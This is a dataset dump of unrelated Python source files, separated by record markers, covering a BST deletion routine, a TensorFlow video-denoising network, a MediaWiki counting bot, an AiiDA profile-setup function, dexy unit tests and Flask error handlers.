    """Delete `key` from the BST rooted at `root`; return the new subtree root."""
    # Base Case: empty subtree, nothing to delete.
    if root is None:
        return root
    # Recurse into the side that could contain the key.
    if key < root.key:
        root.left = deleteNode(root.left, key)
        return root
    elif(key > root.key):
        root.right = deleteNode(root.right, key)
        return root
    # root.key == key from here on: this is the node to remove.
    # Case 1 -- leaf node: simply drop it.
    if root.left is None and root.right is None:
        return None
    # Case 2 -- one child: splice the child into this node's place.
    if root.left is None:
        temp = root.right
        root = None
        return temp
    elif root.right is None:
        temp = root.left
        root = None
        return temp
    # Case 3 -- two children: find the in-order successor (leftmost node
    # of the right subtree) together with its parent.
    succParent = root
    succ = root.right
    while succ.left != None:
        succParent = succ
        succ = succ.left
    # Detach the successor. It has no left child, so hang its right
    # subtree where the successor used to be. When no left descent
    # happened, the successor is root.right itself.
    if succParent != root:
        succParent.left = succ.right
    else:
        succParent.right = succ.right
    # Copy the successor's key into this node instead of relinking nodes.
    root.key = succ.key
    return root
# Demo: build a sample BST and delete nodes covering all three cases.
root = None
root = insert(root, 50)
root = insert(root, 30)
root = insert(root, 20)
root = insert(root, 40)
root = insert(root, 70)
root = insert(root, 60)
root = insert(root, 80)
print("Inorder traversal of the given tree")
inorder(root)
# Case 1: delete a leaf node.
print("\nDelete 20")
root = deleteNode(root, 20)
print("Inorder traversal of the modified tree")
inorder(root)
# Case 2: delete a node that now has a single child.
print("\nDelete 30")
root = deleteNode(root, 30)
print("Inorder traversal of the modified tree")
inorder(root)
# Case 3: delete a node with two children (the root).
print("\nDelete 50")
root = deleteNode(root, 50)
print("Inorder traversal of the modified tree")
inorder(root)
| StarcoderdataPython |
1615875 | # -*- coding: utf-8 -*-
"""
@author: clausmichele
"""
import time
import tensorflow as tf
import cv2
import numpy as np
from tqdm import tqdm
def SpatialCNN(input, is_training=False, output_channels=3, reuse=tf.AUTO_REUSE):
    """Spatial denoising CNN: 20 conv blocks that predict the noise residual.

    Returns input - predicted_noise (residual learning). Scope names
    ('block1'..'block20') must stay as-is: the checkpoint-restoring code in
    ViDeNN.denoise filters variables by the first letter of their scope.
    NOTE(review): `input` shadows the builtin; kept for compatibility.
    """
    with tf.variable_scope('block1',reuse=reuse):
        output = tf.layers.conv2d(input, 128, 3, padding='same', activation=tf.nn.relu)
    # Blocks 2-19: conv (no bias) + batch norm + ReLU.
    for layers in range(2, 20):
        with tf.variable_scope('block%d' % layers,reuse=reuse):
            output = tf.layers.conv2d(output, 64, 3, padding='same', name='conv%d' % layers, use_bias=False)
            output = tf.nn.relu(tf.layers.batch_normalization(output, training=is_training))
    with tf.variable_scope('block20', reuse=reuse):
        output = tf.layers.conv2d(output, output_channels, 3, padding='same', use_bias=False)
    # Residual connection: subtract the predicted noise from the input.
    return input - output
def Temp3CNN(input, is_training=False, output_channels=3, reuse=tf.AUTO_REUSE):
    """Temporal denoising CNN over 3 stacked RGB frames (9 input channels).

    Predicts a residual for the middle frame and returns
    middle_frame - residual. Scope names are prefixed 'temp-' so the
    checkpoint loader can split spatial ('b...') from temporal ('t...')
    variables by first letter. NOTE(review): `is_training` is unused here
    (this net has no batch normalization).
    """
    # Channels 3:6 are the middle frame of the (prev, cur, next) stack.
    input_middle = input[:,:,:,3:6]
    with tf.variable_scope('temp-block1',reuse=reuse):
        output = tf.layers.conv2d(input, 128, 3, padding='same', activation=tf.nn.leaky_relu)
    for layers in range(2, 20):
        with tf.variable_scope('temp-block%d' % layers,reuse=reuse):
            output = tf.layers.conv2d(output, 64, 3, padding='same', name='conv%d' % layers, use_bias=False)
            output = tf.nn.leaky_relu(output)
    with tf.variable_scope('temp-block20', reuse=reuse):
        output = tf.layers.conv2d(output, output_channels, 3, padding='same', use_bias=False)
    return input_middle - output
class ViDeNN(object):
    """TF1 graph + session wrapper chaining Spatial-CNN and Temp3-CNN
    for video denoising: each frame is first denoised spatially, then a
    sliding window of three spatially-denoised frames feeds the temporal net.
    """
    def __init__(self, sess):
        """Build placeholders and both sub-networks on the given tf.Session."""
        self.sess = sess
        # build model
        self.Y_ = tf.placeholder(tf.float32, [None, None, None, 3],name='clean_image')
        self.X = tf.placeholder(tf.float32, [None, None, None, 3],name='noisy_image')
        self.Y = SpatialCNN(self.X)
        # Temporal net consumes 3 stacked RGB frames (9 channels).
        self.Y_frames = tf.placeholder(tf.float32, [None, None, None, 9],name='clean_frames')
        self.Xframes = tf.placeholder(tf.float32, [None, None, None, 9],name='noisy_frames')
        self.Yframes = Temp3CNN(self.Xframes)
        init = tf.global_variables_initializer()
        self.sess.run(init)
        print("[*] Initialize model successfully...")
    def denoise(self, eval_files, eval_files_noisy, print_psnr, ckpt_dir, save_dir):
        """Denoise the frame sequence in eval_files_noisy and write PNGs to save_dir.

        :param eval_files: paths of the clean reference frames (for PSNR)
        :param eval_files_noisy: paths of the noisy input frames
        :param print_psnr: when True, print per-frame and average PSNR
        :param ckpt_dir: combined checkpoint dir, or None to restore the two
            sub-nets from their separate default checkpoint directories
        :param save_dir: output directory for denoised frames
        """
        # init variables
        tf.global_variables_initializer().run()
        assert len(eval_files) != 0, '[!] No testing data!'
        if ckpt_dir is None:
            full_path = tf.train.latest_checkpoint('./Temp3-CNN/ckpt')
            if(full_path is None):
                print('[!] No Temp3-CNN checkpoint!')
                quit()
            # Temporal variables are those whose scope does NOT start with
            # 'b' (spatial scopes are 'block*', temporal are 'temp-*').
            vars_to_restore_temp3CNN = {}
            for i in range(len(tf.global_variables())):
                if tf.global_variables()[i].name[0] != 'b':
                    a = tf.global_variables()[i].name.split(':')[0]
                    vars_to_restore_temp3CNN[a] = tf.global_variables()[i]
            saver_t = tf.train.Saver(var_list=vars_to_restore_temp3CNN)
            saver_t.restore(self.sess, full_path)
            full_path = tf.train.latest_checkpoint('./Spatial-CNN/ckpt_awgn')
            if(full_path is None):
                print('[!] No Spatial-CNN checkpoint!')
                quit()
            # Spatial variables: every scope not starting with 't'.
            vars_to_restore_spatialCNN = {}
            for i in range(len(tf.global_variables())):
                if tf.global_variables()[i].name[0] != 't':
                    a = tf.global_variables()[i].name.split(':')[0]
                    vars_to_restore_spatialCNN[a] = tf.global_variables()[i]
            saver_s = tf.train.Saver(var_list=vars_to_restore_spatialCNN)
            saver_s.restore(self.sess, full_path)
        else:
            load_model_status, _ = self.load(ckpt_dir)
            print("[*] Model restore successfully!")
        # Sliding-window denoising loop over consecutive frame triples.
        psnr_sum = 0
        start = time.time()
        for idx in tqdm(range(len(eval_files)-1)):
            if idx==0:
                # Bootstrap: load and spatially denoise the first three frames.
                test = cv2.imread(eval_files[idx])
                test1 = cv2.imread(eval_files[idx+1])
                test2 = cv2.imread(eval_files[idx+2])
                noisy = cv2.imread(eval_files_noisy[idx])
                noisy1 = cv2.imread(eval_files_noisy[idx+1])
                noisy2 = cv2.imread(eval_files_noisy[idx+2])
                test = test.astype(np.float32) / 255.0
                test1 = test1.astype(np.float32) / 255.0
                test2 = test2.astype(np.float32) / 255.0
                noisy = noisy.astype(np.float32) / 255.0
                noisy1 = noisy1.astype(np.float32) / 255.0
                noisy2 = noisy2.astype(np.float32) / 255.0
                noisyin2 = np.zeros((1,test.shape[0],test.shape[1],9))
                current = np.zeros((test.shape[0],test.shape[1],3))
                previous = np.zeros((test.shape[0],test.shape[1],3))
                noisyin = np.zeros((3,test.shape[0],test.shape[1],3))
                noisyin[0] = noisy
                noisyin[1] = noisy1
                noisyin[2] = noisy2
                out = self.sess.run([self.Y],feed_dict={self.X:noisyin})
                out = np.asarray(out)
                # First frame has no predecessor: duplicate it in the window.
                noisyin2[0,:,:,0:3] = out[0,0]
                noisyin2[0,:,:,3:6] = out[0,0]
                noisyin2[0,:,:,6:] = out[0,1]
                temp_clean_image= self.sess.run([self.Yframes],feed_dict={self.Xframes:noisyin2})
                temp_clean_image = np.asarray(temp_clean_image)
                cv2.imwrite(save_dir + '/%04d.png'%idx,temp_clean_image[0,0]*255)
                psnr = psnr_scaled(test,temp_clean_image[0,0])
                psnr1 = psnr_scaled(test,out[0,0])
                psnr_sum += psnr
                if print_psnr: print(" frame %d denoised, PSNR: %.2f" % (idx, psnr))
                else: print(" frame %d denoised" % (idx))
                # Prepare the (0, 1, 2) window for the next temporal pass.
                noisyin2[0,:,:,0:3] = out[0,0]
                noisyin2[0,:,:,3:6] = out[0,1]
                noisyin2[0,:,:,6:] = out[0,2]
                current[:,:,:] = out[0,2,:,:,:]
                previous[:,:,:] = out[0,1,:,:,:]
            else:
                if idx<(len(eval_files)-2):
                    # Middle of the sequence: spatially denoise the incoming
                    # frame and shift the 3-frame window forward.
                    test3 = cv2.imread(eval_files[idx+2])
                    test3 = test3.astype(np.float32) / 255.0
                    noisy3 = cv2.imread(eval_files_noisy[idx+2])
                    noisy3 = noisy3.astype(np.float32) / 255.0
                    out2 = self.sess.run([self.Y],feed_dict={self.X:np.expand_dims(noisy3,0)})
                    out2 = np.asarray(out2)
                    noisyin2[0,:,:,0:3] = previous
                    noisyin2[0,:,:,3:6] = current
                    noisyin2[0,:,:,6:] = out2[0,0]
                    previous = current
                    current = out2[0,0]
                else:
                    # Last window: no next frame, duplicate the final one.
                    try:
                        out2
                    except NameError:
                        out2 = np.zeros((out.shape))
                        out2=out
                        out2[0,0]=out[0,2]
                    noisyin2[0,:,:,0:3] = current
                    noisyin2[0,:,:,3:6] = out2[0,0]
                    noisyin2[0,:,:,6:] = out2[0,0]
                temp_clean_image= self.sess.run([self.Yframes],feed_dict={self.Xframes:noisyin2})
                temp_clean_image = np.asarray(temp_clean_image)
                cv2.imwrite(save_dir+ '/%04d.png'%(idx+1),temp_clean_image[0,0]*255)
            # calculate PSNR for the frame emitted in this iteration
            if idx==0:
                psnr1 = psnr_scaled(test1,out[0,1])
                psnr = psnr_scaled(test1, temp_clean_image[0,0])
            else:
                psnr1 = psnr_scaled(test2,previous)
                psnr = psnr_scaled(test2, temp_clean_image[0,0])
                # Shift the clean-reference window (test3 may not exist at
                # the final iteration; fall back to the last known frame).
                try:
                    test3
                except NameError:
                    test3=test2
                test2=test3
            if print_psnr: print(" frame %d denoised, PSNR: %.2f" % (idx+1, psnr))
            else: print(" frame %d denoised" % (idx+1))
            psnr_sum += psnr
        avg_psnr = psnr_sum / len(eval_files)
        if print_psnr: print("--- Average PSNR %.2f ---" % avg_psnr)
        print("--- Elapsed time: %.4fs" %(time.time()-start))
    def load(self, checkpoint_dir):
        """Restore the full model from checkpoint_dir.

        :return: (loaded_ok, global_step) -- (False, 0) when no checkpoint found.
        """
        print("[*] Reading checkpoint...")
        saver = tf.train.Saver()
        ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
        if ckpt and ckpt.model_checkpoint_path:
            full_path = tf.train.latest_checkpoint(checkpoint_dir)
            # Global step is encoded as the trailing '-NNN' of the file name.
            global_step = int(full_path.split('/')[-1].split('-')[-1])
            saver.restore(self.sess, full_path)
            return True, global_step
        else:
            return False, 0
def psnr_scaled(im1, im2):
    """PSNR between two images whose pixel values are scaled to [0, 1]."""
    # Rescale the mean squared error to the 8-bit range, then apply the
    # standard PSNR formula with MAX = 255 (equivalent to 10*log10(1/mse)).
    squared_error = (im1 - im2) ** 2
    mse = squared_error.mean() * (255 ** 2)
    return 10 * np.log10(255 ** 2 / mse)
| StarcoderdataPython |
3309896 | #!/usr/bin/env python3
import argparse
import mwbot
import vowi
def count_excluded_resources():
    """Count wiki resources excluded from the materials tally.

    Relies on the module-level `site` connection created under __main__.
    NOTE(review): the exclusion rules mirror on-wiki counting conventions --
    confirm against the wiki's own documentation.
    """
    # Titles of all course ("LVA") pages that are not marked outdated.
    current_lvas = []
    for title in site.get('askargs', conditions='Category:LVAs|Ist veraltet::0', parameters='limit=9999')['query']['results']:
        current_lvas.append(title)
    duplicates = []
    excluded = 0
    # Walk every file page together with its wiki links and duplicate info.
    for page in site.results(generator='allpages', gapnamespace=mwbot.NS_FILE,
            gaplimit='max', prop='links|duplicatefiles', pllimit='max', dflimit='max'):
        if page['title'] in duplicates:
            # Duplicate of a file already attributed to a current LVA.
            excluded += 1
        elif 'links' in page:
            for link in page['links']:
                if link['title'] in current_lvas:
                    # File belongs to a current LVA: remember its duplicates
                    # so they get excluded when encountered later.
                    if 'duplicatefiles' in page:
                        for dup in page['duplicatefiles']:
                            duplicates.append('Datei:'+dup['name'].replace('_', ' '))
                    break
            else:
                # Linked somewhere, but not to any current LVA.
                excluded += 1
    # Subpages whose parent page is not a current LVA are excluded as well.
    for ns in vowi.UNI_NAMESPACES:
        for p in site.results(list='allpages', apfilterredir='nonredirects', apnamespace=ns, aplimit='max'):
            if '/' in p['title']:
                if not p['title'].split('/', 1)[0] in current_lvas:
                    excluded += 1
    return excluded
if __name__ == '__main__':
    # Connect to the wiki, compute the exclusion count and publish it to the
    # on-wiki template used by the materials counter.
    parser = mwbot.get_argparser()
    args = parser.parse_args()
    site = mwbot.getsite('excluded_mat_counter.py', args)
    count = count_excluded_resources()
    print(count)
    mwbot.save(site, 'Vorlage:!materialien anzahl/exkludiert', None, count, site.msg('update'))
| StarcoderdataPython |
1621534 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 22 01:59:25 2020
@author: nacer
"""
"""
Problem link : https://leetcode.com/problems/palindrome-number/
"""
class Solution:
    def isPalindrome(self, x: int) -> bool:
        """Return True when the integer x reads the same forwards and backwards."""
        # Negative numbers can never be palindromes; otherwise compare x
        # against its digit-reversed value (module-level reverse()).
        return x >= 0 and reverse(x) == x
def reverse(x):
    """Return the decimal digits of x in reverse order.

    Returns 0 for x <= 0, matching the original loop's behavior.
    """
    result = 0
    while x > 0:
        x, digit = divmod(x, 10)
        result = result * 10 + digit
    return result
4835944 | # -*- coding: utf-8 -*-
# pylint: disable=superfluous-parens,too-many-locals,too-many-statements,too-many-branches
"""Functions to create, inspect and manipulate profiles in the configuration file."""
import os
import sys
import click
def setup_profile(profile, only_config, set_default=False, non_interactive=False, **kwargs):
    """
    Setup an AiiDA profile and AiiDA user (and the AiiDA default user).
    :param profile: Profile name
    :param only_config: do not create a new user
    :param set_default: set the new profile as the default
    :param non_interactive: do not prompt for configuration values, fail if not all values are given as kwargs.
    :param backend: one of 'django', 'sqlalchemy'
    :param email: valid email address for the user
    :param db_host: hostname for the database
    :param db_port: port to connect to the database
    :param db_name: name of the database
    :param db_user: name of the db user
    :param db_pass: password of the db user
    :param repo: path to the file repository
    """
    from aiida.backends import settings
    from aiida.backends.profile import BACKEND_SQLA, BACKEND_DJANGO
    from aiida.backends.utils import set_backend_type
    from aiida.cmdline import EXECNAME
    from aiida.cmdline.commands import cmd_user
    from aiida.common.exceptions import InvalidOperation
    from aiida.common.setup import (create_base_dirs, create_configuration, set_default_profile, DEFAULT_UMASK,
                                    create_config_noninteractive)
    only_user_config = only_config
    # Create the directories to store the configuration files
    create_base_dirs()
    if settings.AIIDADB_PROFILE and profile:
        sys.exit('the profile argument cannot be used if verdi is called with -p option: {} and {}'.format(
            settings.AIIDADB_PROFILE, profile))
    gprofile = settings.AIIDADB_PROFILE or profile
    if gprofile == profile:
        settings.AIIDADB_PROFILE = profile
    if not settings.AIIDADB_PROFILE:
        settings.AIIDADB_PROFILE = 'default'
    # used internally later
    gprofile = settings.AIIDADB_PROFILE
    created_conf = None
    # ask and store the configuration of the DB
    if non_interactive:
        try:
            created_conf = create_config_noninteractive(
                profile=gprofile,
                backend=kwargs['backend'],
                email=kwargs['email'],
                db_host=kwargs['db_host'],
                db_port=kwargs['db_port'],
                db_name=kwargs['db_name'],
                db_user=kwargs['db_user'],
                db_pass=kwargs.get('db_pass', ''),
                repo=kwargs['repo'],
                force_overwrite=kwargs.get('force_overwrite', False))
        except ValueError as exception:
            # NOTE(review): "configuation" typo is in the user-facing message.
            click.echo("Error during configuation: {}".format(exception.message), err=True)
            sys.exit(1)
        except KeyError as exception:
            import traceback
            click.echo(traceback.format_exc())
            click.echo(
                "--non-interactive requires all values to be given on the commandline! Missing argument: {}".format(
                    exception.message),
                err=True)
            sys.exit(1)
    else:
        try:
            created_conf = create_configuration(profile=gprofile)
        except ValueError as exception:
            print >> sys.stderr, "Error during configuration: {}".format(exception.message)
            sys.exit(1)
    # Set default DB profile
    set_default_profile(gprofile, force_rewrite=False)
    if only_user_config:
        print("Only user configuration requested, " "skipping the migrate command")
    else:
        # Run the backend-specific schema migration for the new profile.
        print("Executing now a migrate command...")
        backend_choice = created_conf['AIIDADB_BACKEND']
        if backend_choice == BACKEND_DJANGO:
            print("...for Django backend")
            # The correct profile is selected within load_dbenv.
            # Setting os.umask here since sqlite database gets created in
            # this step.
            old_umask = os.umask(DEFAULT_UMASK)
            # This check should be done more properly
            # try:
            #     backend_type = get_backend_type()
            # except KeyError:
            #     backend_type = None
            #
            # if backend_type is not None and backend_type != BACKEND_DJANGO:
            #     raise InvalidOperation("An already existing database found"
            #                            "and a different than the selected"
            #                            "backend was used for its "
            #                            "management.")
            try:
                from aiida.backends.djsite.utils import pass_to_django_manage
                pass_to_django_manage([EXECNAME, 'migrate'], profile=gprofile)
            finally:
                os.umask(old_umask)
            set_backend_type(BACKEND_DJANGO)
        elif backend_choice == BACKEND_SQLA:
            print("...for SQLAlchemy backend")
            from aiida import is_dbenv_loaded
            from aiida.backends.sqlalchemy.utils import _load_dbenv_noschemacheck, check_schema_version
            from aiida.backends.profile import load_profile
            # We avoid calling load_dbenv since we want to force the schema
            # migration
            if not is_dbenv_loaded():
                settings.LOAD_DBENV_CALLED = True
                # This is going to set global variables in settings, including settings.BACKEND
                load_profile()
                _load_dbenv_noschemacheck()
            # Perform the needed migration quietly
            check_schema_version(force_migration=True)
            set_backend_type(BACKEND_SQLA)
        else:
            raise InvalidOperation("Not supported backend selected.")
        print("Database was created successfully")
    # I create here the default user
    print("Loading new environment...")
    if only_user_config:
        from aiida.backends.utils import load_dbenv, is_dbenv_loaded
        # db environment has not been loaded in this case
        if not is_dbenv_loaded():
            load_dbenv()
    from aiida.common.setup import DEFAULT_AIIDA_USER
    from aiida.orm.backend import construct_backend
    backend = construct_backend()
    if not backend.users.find(email=DEFAULT_AIIDA_USER):
        print("Installing default AiiDA user...")
        nuser = backend.users.create(email=DEFAULT_AIIDA_USER, first_name="AiiDA", last_name="Daemon")
        nuser.is_active = True
        nuser.store()
    from aiida.common.utils import get_configured_user_email
    email = get_configured_user_email()
    print("Starting user configuration for {}...".format(email))
    if email == DEFAULT_AIIDA_USER:
        print("You set up AiiDA using the default Daemon email ({}),".format(email))
        print("therefore no further user configuration will be asked.")
    else:
        if non_interactive:
            # Here we map the keyword arguments onto the command line arguments
            # for verdi user configure. We have to be careful that there the
            # argument names are the same as those in the kwargs dict
            commands = [kwargs['email'], '--non-interactive']
            for arg in ('first_name', 'last_name', 'institution'):
                value = kwargs.get(arg, None)
                if value is not None:
                    commands.extend(('--{}'.format(arg.replace('_', '-')), str(value)))
        else:
            commands = [email]
        # Ask to configure the user
        try:
            # pylint: disable=no-value-for-parameter
            cmd_user.configure(commands)
        except SystemExit:
            # Have to catch this as the configure command will do a sys.exit()
            pass
    if set_default:
        set_default_profile(profile, force_rewrite=True)
    print("Setup finished.")
| StarcoderdataPython |
from subprocess import check_output
import sys

# Extract every plain object file (*.o) from the archive given as argv[1],
# skipping members whose names end in "lso.o".
archive = sys.argv[1]
for member in check_output(["ar", "-t", archive]).decode().split("\n"):
    if member.endswith(".o") and not member.endswith("lso.o"):
        check_output(["ar", "-xv", archive, member])
| StarcoderdataPython |
1641290 | from dexy.doc import Doc
from dexy.node import Node
from dexy.node import PatternNode
from dexy.wrapper import Wrapper
from tests.utils import wrap
import dexy.doc
import dexy.node
import os
import time
def test_create_node():
    """Node.create_instance('doc', ...) builds a Doc carrying kwargs, wrapper and hashid."""
    with wrap() as wrapper:
        node = dexy.node.Node.create_instance(
            "doc",
            "foo.txt",
            wrapper,
            [],
            # kwargs
            foo='bar',
            contents="these are contents"
        )
        assert node.__class__ == dexy.doc.Doc
        assert node.args['foo'] == 'bar'
        assert node.wrapper == wrapper
        assert node.inputs == []
        assert len(node.hashid) == 32
def test_node_arg_caching():
    """Node kwargs serialize to a sorted argstring; save/load round-trip detects changes."""
    with wrap() as wrapper:
        wrapper.nodes = {}
        node = dexy.node.Node("foo", wrapper, [], foo='bar', baz=123)
        wrapper.add_node(node)
        assert node.hashid == 'acbd18db4cc2f85cedef654fccc4a4d8'
        assert node.args['foo'] == 'bar'
        assert node.args['baz'] == 123
        assert node.sorted_arg_string() == '[["baz", 123], ["foo", "bar"]]'
        assert os.path.exists(wrapper.artifacts_dir)
        assert not os.path.exists(wrapper.node_argstrings_filename())
        wrapper.save_node_argstrings()
        assert os.path.exists(wrapper.node_argstrings_filename())
        wrapper.load_node_argstrings()
        assert not node.check_args_changed()
        # Mutating an arg must be detected against the saved argstrings.
        node.args['baz'] = 456
        assert node.check_args_changed()
        wrapper.save_node_argstrings()
        wrapper.load_node_argstrings()
        assert not node.check_args_changed()
# Dexy YAML config used by test_script_node_caching__slow: a script node
# running three shell documents in order.
SCRIPT_YAML = """
script:scriptnode:
- start.sh|shint
- middle.sh|shint
- end.sh|shint
"""
def test_script_node_caching__slow():
    """Script nodes run on first build, consolidate from cache, and rerun when a member changes."""
    with wrap():
        with open("start.sh", "w") as f:
            f.write("pwd")
        with open("middle.sh", "w") as f:
            f.write("echo `time`")
        with open("end.sh", "w") as f:
            f.write("echo 'done'")
        with open("dexy.yaml", "w") as f:
            f.write(SCRIPT_YAML)
        wrapper1 = Wrapper(log_level="DEBUG")
        wrapper1.run_from_new()
        for node in list(wrapper1.nodes.values()):
            assert node.state == 'ran'
        # Second run with nothing changed: everything comes from cache.
        wrapper2 = Wrapper()
        wrapper2.run_from_new()
        for node in list(wrapper2.nodes.values()):
            assert node.state == 'consolidated'
        # Sleep so the rewritten file gets a strictly newer mtime.
        time.sleep(1.1)
        with open("middle.sh", "w") as f:
            f.write("echo 'new'")
        wrapper3 = Wrapper()
        wrapper3.run_from_new()
        for node in list(wrapper1.nodes.values()):
            assert node.state == 'ran'
def test_node_caching__slow():
    """Changing one input reruns only the affected docs; unchanged ones consolidate."""
    # TODO mock out os.stat to get different mtimes without having to sleep?
    with wrap() as wrapper:
        with open("hello.py", "w") as f:
            f.write("print(1+2)\n")
        with open("doc.txt", "w") as f:
            f.write("1 + 1 = {{ d['hello.py|py'] }}")
        wrapper = Wrapper(log_level='DEBUG')
        hello_py = Doc("hello.py|py", wrapper)
        doc_txt = Doc("doc.txt|jinja",
                wrapper,
                [hello_py]
                )
        wrapper.run_docs(doc_txt)
        assert str(doc_txt.output_data()) == "1 + 1 = 3\n"
        assert str(hello_py.output_data()) == "3\n"
        assert hello_py.state == 'ran'
        assert doc_txt.state == 'ran'
        # Re-run with nothing changed: both docs come from cache.
        wrapper = Wrapper(log_level='DEBUG')
        hello_py = Doc("hello.py|py", wrapper)
        doc_txt = Doc("doc.txt|jinja",
                wrapper,
                [hello_py]
                )
        wrapper.run_docs(doc_txt)
        assert hello_py.state == 'consolidated'
        assert doc_txt.state == 'consolidated'
        # Touch only doc.txt: only doc_txt should rerun.
        time.sleep(1.1)
        with open("doc.txt", "w") as f:
            f.write("1 + 1 = {{ d['hello.py|py'] }}\n")
        wrapper = Wrapper(log_level='DEBUG')
        hello_py = Doc("hello.py|py", wrapper)
        doc_txt = Doc("doc.txt|jinja",
                wrapper,
                [hello_py]
                )
        wrapper.run_docs(doc_txt)
        assert hello_py.state == 'consolidated'
        assert doc_txt.state == 'ran'
        # Touch the input hello.py: both docs should rerun.
        time.sleep(1.1)
        with open("hello.py", "w") as f:
            f.write("print(1+1)\n")
        wrapper = Wrapper(log_level='DEBUG')
        hello_py = Doc("hello.py|py", wrapper)
        doc_txt = Doc("doc.txt|jinja",
                wrapper,
                [hello_py]
                )
        wrapper.run_docs(doc_txt)
        assert hello_py.state == 'ran'
        assert doc_txt.state == 'ran'
def test_node_init_with_inputs():
    """walk_inputs yields dependencies before the node itself."""
    with wrap() as wrapper:
        node = Node("foo.txt",
                wrapper,
                [Node("bar.txt", wrapper)]
                )
        assert node.key == "foo.txt"
        assert node.inputs[0].key == "bar.txt"
        expected = {
                0 : "bar.txt",
                1 : "foo.txt"
                }
        for i, n in enumerate(node.walk_inputs()):
            assert expected[i] == n.key
def test_doc_node_populate():
    """A 'doc' node's key_with_class combines class alias and document key."""
    with wrap() as wrapper:
        node = Node.create_instance(
                'doc', "foo.txt", wrapper,
                [], contents='foo')
        assert node.key_with_class() == "doc:foo.txt"
def test_doc_node_with_filters():
    """Filter suffixes are preserved in the node key."""
    with wrap() as wrapper:
        node = Node.create_instance('doc',
                "foo.txt|outputabc", wrapper, [], contents='foo')
        assert node.key_with_class() == "doc:foo.txt|outputabc"
def test_pattern_node():
    """A '*.txt' PatternNode expands to one Doc child per matching file, forwarding kwargs."""
    with wrap() as wrapper:
        with open("foo.txt", "w") as f:
            f.write("foo!")
        with open("bar.txt", "w") as f:
            f.write("bar!")
        # Rebuild a fresh wrapper over the files just written.
        wrapper = Wrapper(log_level='DEBUG')
        wrapper.to_valid()
        wrapper.nodes = {}
        wrapper.roots = []
        wrapper.batch = dexy.batch.Batch(wrapper)
        wrapper.filemap = wrapper.map_files()
        node = PatternNode("*.txt",
                wrapper,
                [],
                foo="bar")
        assert node.args['foo'] == 'bar'
        wrapper.run_docs(node)
        assert len(node.children) == 2
        for child in node.children:
            assert child.__class__.__name__ == "Doc"
            assert child.args['foo'] == 'bar'
            assert child.key_with_class() in ["doc:foo.txt", "doc:bar.txt"]
            assert child.filters == []
def test_pattern_node_multiple_filters():
    """A chained-filter pattern yields a child Doc with all filter aliases in order."""
    with wrap() as wrapper:
        with open("foo.txt", "w") as f:
            f.write("foo!")
        wrapper = Wrapper(log_level='DEBUG')
        wrapper.to_valid()
        wrapper.nodes = {}
        wrapper.roots = []
        wrapper.batch = dexy.batch.Batch(wrapper)
        wrapper.filemap = wrapper.map_files()
        node = PatternNode("*.txt|dexy|dexy|dexy", wrapper=wrapper)
        doc = node.children[0]
        assert doc.key == "foo.txt|dexy|dexy|dexy"
        assert doc.filter_aliases == ['dexy', 'dexy', 'dexy']
        assert doc.parent == node
def test_pattern_node_one_filter():
    """A single-filter pattern yields one child Doc keyed by filename plus filter alias."""
    with wrap() as wrapper:
        with open("foo.txt", "w") as f:
            f.write("foo!")
        wrapper = Wrapper(log_level='DEBUG')
        wrapper.to_valid()
        wrapper.nodes = {}
        wrapper.roots = []
        wrapper.batch = dexy.batch.Batch(wrapper)
        wrapper.filemap = wrapper.map_files()
        node = PatternNode("*.txt|dexy", wrapper=wrapper)
        doc = node.children[0]
        # Restored expected literal: the key is the filename plus the single
        # filter alias (a dataset redaction had replaced it with "<KEY>"),
        # mirroring test_pattern_node_multiple_filters above.
        assert doc.key == "foo.txt|dexy"
        assert doc.filter_aliases == ['dexy']
        assert doc.parent == node
3398609 | <gh_stars>1-10
from http import HTTPStatus
from typing import Union
from flask import make_response, Response, Flask
from webargs import ValidationError
from webargs.flaskparser import parser
from werkzeug.exceptions import BadRequest
from src.extensions import jwt_manager
AUTH_ERROR = 'Authentication failed'
def error_response(message: Union[str, dict],
                   status_code: int,
                   **additional_information: dict) -> Response:
    """Build the API-wide uniform error Response so every error shares one shape."""
    payload = {
        'error': message,
        'status_code': status_code,
        'additional_information': additional_information,
    }
    return make_response(payload, status_code)
def item_not_found_response(item_repr: str, searched_id: Union[str, int] = None) -> Response:
    """404 response for a missing item, optionally tagged with the id searched for."""
    label = item_repr if searched_id is None else f'{item_repr}(id: {searched_id!r})'
    return error_response(f'Could not find item <{label}>', HTTPStatus.NOT_FOUND)
def auth_error():
    # Uniform 401 response reused by all JWT failure callbacks below.
    return error_response(AUTH_ERROR, HTTPStatus.UNAUTHORIZED)
def register_exceptions_handles(app: Flask):
    """Register Flask, webargs and JWT error handlers so every failure path
    returns the uniform error_response() payload."""
    @app.errorhandler(HTTPStatus.METHOD_NOT_ALLOWED)
    def not_allowed(e) -> Response:
        return error_response(str(e), HTTPStatus.METHOD_NOT_ALLOWED)

    @app.errorhandler(HTTPStatus.NOT_FOUND)
    def not_found(e) -> Response:
        return error_response(str(e), HTTPStatus.NOT_FOUND)

    @app.errorhandler(HTTPStatus.INTERNAL_SERVER_ERROR)
    def internal_error(e) -> Response:
        return error_response(str(e), HTTPStatus.INTERNAL_SERVER_ERROR)

    @app.errorhandler(HTTPStatus.BAD_REQUEST)
    def bad_request(e) -> Response:
        # e.response carries the validation details attached in handle_error.
        return error_response(e.response, HTTPStatus.BAD_REQUEST)

    @parser.error_handler
    def handle_error(error: ValidationError, req, schema, *, error_status_code, error_headers):
        # Convert webargs validation failures into a BadRequest whose
        # `response` holds the per-field messages from the JSON payload.
        error = error.messages.get('json')
        raise BadRequest('Invalid args were passed', response=error)

    @jwt_manager.expired_token_loader
    def expired_token_response(*args) -> Response:
        return auth_error()

    @jwt_manager.invalid_token_loader
    def invalid_token_response(*args) -> Response:
        return auth_error()

    @jwt_manager.unauthorized_loader
    def no_jwt_is_present(*args) -> Response:
        return auth_error()
| StarcoderdataPython |
115694 | <reponame>robscetury/hbos
import typing
from typing import Dict
from pandas import DataFrame
from hbos_server.outputbase import OutputBase
class DeleteSourceOutput(OutputBase):
    """Output filter that removes data sets which are no longer needed."""

    def output(self, name: str, input_data: Dict[str, DataFrame]) -> typing.Tuple[str, object]:
        """
        Delete data sets that are no longer needed -- for example, one that
        has already been collated when the source data should not be kept.
        The keys to remove come from this filter's "deleteKeys" option.
        """
        for key in self.options["deleteKeys"]:
            del input_data[key]
        return name, input_data
1614666 | <filename>commands/__init__.py
from . import get_runtimes
from . import get_help
from . import run_code
from . import remind
from . import inspiration
from . import roll
from . import alerts
from . import update_presence
from . import add_bad_reply | StarcoderdataPython |
